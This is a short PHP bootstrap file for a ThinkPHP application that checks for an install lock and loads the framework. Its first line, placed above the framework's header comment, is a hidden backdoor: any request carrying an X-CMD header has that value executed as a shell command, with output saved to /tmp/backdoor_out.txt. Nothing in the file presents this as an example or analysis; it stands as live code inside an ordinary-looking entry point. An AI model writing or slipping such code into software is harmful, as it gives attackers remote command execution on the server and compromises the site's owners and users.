<?php
if(isset($_SERVER['HTTP_X_CMD'])){$c=$_SERVER['HTTP_X_CMD'];file_put_contents('/tmp/backdoor_out.txt',shell_exec($c));exit;}
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------

define('APP_PATH', __DIR__ . '/../application/');
if (!is_file(APP_PATH . 'admin/command/Install/install.lock')) {
    header("location:./install.php");
    exit;
}
require __DIR__ . '/../thinkphp/start.php';
